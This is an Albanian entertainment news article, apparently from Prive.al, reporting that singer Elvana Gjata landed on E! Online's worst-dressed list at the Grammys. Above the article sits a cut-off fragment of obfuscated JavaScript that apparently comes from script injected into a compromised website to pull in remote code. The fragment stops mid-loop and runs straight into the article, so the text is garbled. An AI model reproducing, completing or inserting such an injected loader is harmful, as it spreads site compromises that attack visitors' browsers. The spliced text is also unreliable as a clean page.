;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Elvana Gjata, ndër të veshurat më keq në Grammys

By

Këngëtarja Elvana Gjata bëri debutimin e saj në tentativat për famën ndërkombëtare mbrëmë me paraqitjen tek Grammy Awards.

Interpretuesja e hitit të madh ‘Lejla’ arriti të kishte një vend të saj përkrah producentëve me të cilët bashkëpunon dhe një pjese tjetër të stafit.

E qysh në paraqitjen e parë, ajo ia doli të fitojë vëmendjen e mediumeve të huaja.

Fotot nga tapeti i kuq qarkulluan në faqe të ndryshme të internetit, teksa vëmendja shkoi deri tek portali me emër E! Online.

Fotot e Elvanës nga tapeti i kuq dolën në këtë portal, mirëpo jo në mënyrën më të mirë të mundshme.

Këngëtarja nga Shqipëria ka zënë vend në listën e ngushtë të pjesëmarrësve që janë veshur më së keqi. Në të njejtën listë me Elvanën, gjenden edhe Katy Perry dhe Skrillex.

‘Pjesa e sipërme e fustanit të këngëtares shqiptare nuk është e tmerrshme por proporcioni i pjesës së lartë dhe të poshtme është komplet jashtë’ – shkruan E Online në foton e Elvanës.

Paraprakisht, edhe Bleona kishte zënë vend në këtë kategori vitet e kaluara por mbase ngushëllim mund të shërbejë shprehja që ‘çdo publicitet është publicitet i mirë’. Në prag të lançimit të këngëve në gjuhën angleze, vëmendja nga E! Online është saktësisht ajo që i duhej Elvanës. /Prive.al/

1

Artikuj të ngjashëm